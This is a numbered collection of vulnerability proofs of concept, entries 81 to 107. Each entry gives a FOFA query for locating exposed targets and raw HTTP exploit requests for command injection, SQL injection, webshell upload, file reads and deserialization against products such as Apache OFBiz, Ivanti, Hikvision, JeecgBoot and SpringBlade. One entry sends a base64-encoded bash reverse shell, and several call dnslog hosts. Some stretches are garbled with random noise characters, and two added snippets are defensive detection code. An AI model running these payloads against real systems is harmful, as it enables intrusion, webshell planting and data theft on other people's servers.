Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

; `6 e8 E0 f5 X7 }86. 日本tosei自助洗衣机RCE: U; n) k0 {' d9 L
FOFA:body="tosei_login_check.php"- u  r( E, `! N- w
POST /cgi-bin/network_test.php HTTP/1.1( E6 g- A5 S3 a. b
Host: x.x.x.x& y( V  J, |6 W2 O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; ?, k4 g! T! u- b# F
Connection: close8 `, \8 ~' p- E
Content-Length: 449 a. N; }5 R# Q$ }6 J8 d
Accept: */*
1 D7 F; c1 f% OAccept-Encoding: gzip, ]3 u0 T  e- J0 l; R  U
Accept-Language: en* Y! D3 D- D4 g: m7 @& h
Content-Type: application/x-www-form-urlencoded
9 J: C, y; K0 n! \2 K
. U+ ]7 K6 u. B* F0 W+ Fhost=%0acat${IFS}/etc/passwd%0a&command=ping
( z/ x  Y7 W( Z2 i7 [0 ^+ q9 I4 a* S4 }# t1 o' `. E

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

" c! ^+ `' n5 M" J, g- R% ?- i88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ w, c- |; a/ v) ~. nFOFA:title="明御安全网关"
* \: c8 ]. n- D  h  W5 V% M  sGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.13 P! r: d8 M2 P+ O, Y( ]
Host: x.x.x.xx.x.x.x
7 }% m% a+ h3 o$ v  w3 i% M4 Z; u- c: v" IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 d, y$ ~9 @5 w( kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! W6 o6 ?: T& D+ u! BAccept-Encoding: gzip, deflate
& X3 `& J% r+ W; `8 E) WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Z, y! h; g  H. s% L' G2 _Connection: close# F( j: @# F0 `" G* e; j
" _1 Y" U6 R& R

: a' W' T% b- k2 b/astdfkhl.php
. Y+ T+ ?. G# R& g9 c$ |  ?( c7 z, A
89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

% B  D- z$ T6 I* b1 |) {90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行" j) l9 H0 k1 N
FOFA:icon_hash="-1830859634"6 `& a2 t+ Z0 k' p8 h' Q) n' g6 b
POST /php/ping.php HTTP/1.1& g/ h6 s( a1 F) i+ N- K, M
Host: x.x.x.x; o' m# G) Z! z! t: _+ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
# O5 e4 c0 p3 V9 U  OContent-Length: 514 b" e- `% {# s3 Y
Accept: application/json, text/javascript, */*; q=0.01
$ `6 v; ~1 ~) W4 BAccept-Encoding: gzip, deflate
8 e% f  ^1 V8 l0 n. KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( ]9 s# _6 C$ a/ V" B
Connection: close
( N. }7 B3 F* ~* A6 U" F8 ^Content-Type: application/x-www-form-urlencoded3 w4 I2 u+ t4 v5 C) o! N+ c
X-Requested-With: XMLHttpRequest1 G2 ^' G; T% v0 A

- n" f1 n4 ^8 H, J! Z5 vjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
5 P; l( `" S, i$ n) E$ ?1 b0 [- i& q+ I9 y! w8 `# v: L
  o' x" B7 A2 C0 b7 a
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

8 ~* I& b& [5 P0 H3 ]' k& |! ?92. 海康威视运行管理中心session命令执行
% Q/ g, ^5 g+ d. y: q- J* }- WFastjson命令执行9 L: B$ \; {+ ]% k$ W4 E
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"6 A$ n4 Q& X4 L9 l
POST /center/api/session HTTP/1.1
4 j, A3 u5 \0 R5 B% m7 y  j9 eHost:: p$ s/ T  j5 S" ^% D
Accept: application/json, text/plain, */*( U. r5 U! Q; T# X! ?; Y$ u* \
Accept-Encoding: gzip, deflate& g* i  X% A# o  R7 \
X-Requested-With: XMLHttpRequest- a7 N* x, Z3 [% a) H" e& ~
Content-Type: application/json;charset=UTF-8
! Y7 P+ G2 f& XX-Language-Type: zh_CN& K7 ]- b5 i( ~8 v
Testcmd: echo test
6 v  I& m9 W/ X$ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
( U8 Q6 F: Q$ mAccept-Language: zh-CN,zh;q=0.9# T$ ^& D9 n& ~, |$ o4 T
Content-Length: 5778( g+ c; n9 O% w0 b. Z' h
5 U1 U) Y! C7 v! D8 u  f. V0 b% m
PAYLOAD
5 A) V# S3 A1 X4 [# l9 Z( T8 o$ l: S0 _# j- Y/ t5 z( u

: G  T8 f1 K$ Q, B93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传1 ]! k1 F' e# c1 Z7 u
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& r& a2 ~. K  t7 i2 v& o' J: J% a0 V
POST /?g=app_av_import_save HTTP/1.1
1 U/ m$ u8 z! q. n. `Host: x.x.x.x! S7 m/ z7 W: c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
  f& L9 F1 Z7 _. f- w, E- j# TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. e: k% v" s2 L8 N
9 S6 P! Z  D( b7 U
------WebKitFormBoundarykcbkgdfx$ b5 n4 C8 b9 \2 ?2 \9 f
Content-Disposition: form-data; name="MAX_FILE_SIZE"
- B# o! i& |, e$ P, F6 }
& M* u' {9 c: ?1 n, b10000000* m3 A) O  m! N- d( a5 T/ A* y
------WebKitFormBoundarykcbkgdfx3 d# \) h2 R/ a, J: u
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
4 t4 R; Y0 v+ A/ AContent-Type: text/plain' }' v5 d6 v% ]8 s! y/ Y
) D! ~* ?# y- Z# w. x& i
wagletqrkwrddkthtulxsqrphulnknxa2 O- \0 X* \8 i' m# Q
------WebKitFormBoundarykcbkgdfx
' S; W# Z* i: }; f+ J8 m+ P3 ^Content-Disposition: form-data; name="submit_post"
9 {0 ]0 a& @5 A; V* L+ @
2 k- p! n, @5 {% vobj_app_upfile
; h7 K& {4 v1 t, I% O------WebKitFormBoundarykcbkgdfx
8 W5 p8 X! k) ^5 J6 m, SContent-Disposition: form-data; name="__hash__") X# [3 F+ N+ v9 C6 w" {
2 p9 `- |8 d& M9 ?
0b9d6b1ab7479ab69d9f71b05e0e9445
8 L6 O% X. Q: e4 ]1 y* ?4 D, T5 @------WebKitFormBoundarykcbkgdfx--  ^7 t. c( C7 b. M( F8 n0 h! Y
" o& y) {8 V, g  ]5 h
1 b! d, L! w0 S$ j, X
GET /attachements/xlskxknxa.txt HTTP/1.14 L( Q2 ^- G) |# ~/ w
Host: xx.xx.xx.xx
8 N: F3 s9 [* {0 `7 @* lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* L9 P) B5 k3 @  r! A- G$ F/ n# W

' J, U6 B: l& ^, e2 p; l+ z% v. f  ?& L% |
94. Qi An Xin Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload (the file name must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell:
Start a listener on the attacker host (Kali):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD Intelligent Recording System busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML (an external parameter entity pointing at an attacker-controlled host; a DNS or HTTP callback confirms the issue):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


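Because the XML travels base64-encoded inside a form field, a plain WAF signature on "<!ENTITY" never sees it. The following is an added example, not part of the original post and not Ivanti code: a Python check that decodes a SAMLRequest value the way the SAML HTTP-POST binding (plain base64) and HTTP-Redirect binding (base64 over raw DEFLATE) encode it, then flags any DTD or external entity declaration, which a legitimate AuthnRequest never carries. The sample value is the one from the POC above; the benign AuthnRequest is constructed for the comparison.

```python
import base64
import re
import zlib

# Constructed sample: the SAMLRequest value from the POC above (base64 of an XML
# document that declares an external parameter entity).
SAMPLE_SAMLREQUEST = "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="

# Constructed benign AuthnRequest for comparison (not from the page).
BENIGN_AUTHN_REQUEST = (
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_constructed1" Version="2.0" IssueInstant="2024-02-01T00:00:00Z"/>'
)

# A SAML request has no business carrying a DTD at all, let alone an external entity.
_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(
    rb'<!ENTITY\s+%?\s*[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]+)"', re.IGNORECASE
)


def decode_saml_request(value: str) -> bytes:
    """Undo the SAMLRequest encoding.

    The HTTP-POST binding sends plain base64 of the XML; the HTTP-Redirect
    binding sends base64 of a raw DEFLATE stream.  Decide by looking at the
    first decoded byte rather than trusting which binding was claimed.
    """
    raw = base64.b64decode(value)
    if raw.startswith(b"<"):
        return raw
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def inspect_saml_request(value: str) -> dict:
    """What a detection rule should record about one SAMLRequest value."""
    xml = decode_saml_request(value)
    urls = [m.group(1).decode("utf-8", "replace") for m in _EXTERNAL_ENTITY.finditer(xml)]
    has_doctype = _DOCTYPE.search(xml) is not None
    return {
        "has_doctype": has_doctype,
        "external_entity_urls": urls,
        "xxe_suspected": has_doctype or bool(urls),
    }


def encode_post_binding(xml: bytes) -> str:
    """Encode as the HTTP-POST binding does (used to build test inputs)."""
    return base64.b64encode(xml).decode()


def encode_redirect_binding(xml: bytes) -> str:
    """Encode as the HTTP-Redirect binding does: raw DEFLATE, then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml) + comp.flush()).decode()
```

Run it over SAMLRequest values pulled from web-server logs or a WAF feed: the reported URL is the out-of-band host the probe calls back to, and a DOCTYPE on its own is already enough to block the request.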
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


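What entries 105 to 107 have in common is that the SQL arrives in a request parameter name, not a value: as the public analyses of these issues describe, the generic list endpoints feed every query-string key into the condition builder as a column name, so the key updatexml(1,concat(0x7e,version(),0x7e),1) with value 1 becomes WHERE updatexml(...) = '1' and MySQL's error-based updatexml() leaks version() in the error text. The following is an added example in Python, not SpringBlade's own Java/MyBatis-Plus code: it models that builder, shows the injected name landing in the SQL text while the value is still safely bound, and contrasts it with an allowlist-based builder. The table, its columns and the sqlite3 backend are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for a tenant table so the hardened builder can run end to end.
_SCHEMA = """
CREATE TABLE blade_tenant (id INTEGER PRIMARY KEY, tenant_id TEXT, tenant_name TEXT, is_deleted INTEGER);
INSERT INTO blade_tenant VALUES (1, '000000', 'platform', 0), (2, '000001', 'demo', 0);
"""

# The parameter *name* from the POCs above, used here as a constructed request input.
INJECTED_PARAM = "updatexml(1,concat(0x7e,version(),0x7e),1)"


def build_where_unsafe(params: dict) -> tuple:
    """Vulnerable pattern: every request parameter name becomes a column name.

    Values are bound with placeholders, which is why this survives review:
    the SQL arrives in the *name*, which is concatenated verbatim.
    """
    clauses, args = [], []
    for name, value in params.items():
        clauses.append(f"{name} = ?")
        args.append(value)
    return " AND ".join(clauses) or "1=1", args


ALLOWED_COLUMNS = {"tenant_id", "tenant_name", "is_deleted"}
_IDENT = re.compile(r"^[a-z_][a-z0-9_]*$")


def build_where_safe(params: dict) -> tuple:
    """Hardened: a parameter may only select a column from an explicit allowlist;
    anything else is rejected outright rather than sanitised."""
    clauses, args = [], []
    for name, value in params.items():
        if not _IDENT.match(name) or name not in ALLOWED_COLUMNS:
            raise ValueError(f"rejected filter column {name!r}")
        clauses.append(f"{name} = ?")
        args.append(value)
    return " AND ".join(clauses) or "1=1", args


def tenant_list(params: dict, builder=build_where_safe) -> list:
    """Run a list query built by the chosen builder against the sample table."""
    where, args = builder(params)
    con = sqlite3.connect(":memory:")
    con.executescript(_SCHEMA)
    return con.execute(f"SELECT id, tenant_id FROM blade_tenant WHERE {where}", args).fetchall()
```

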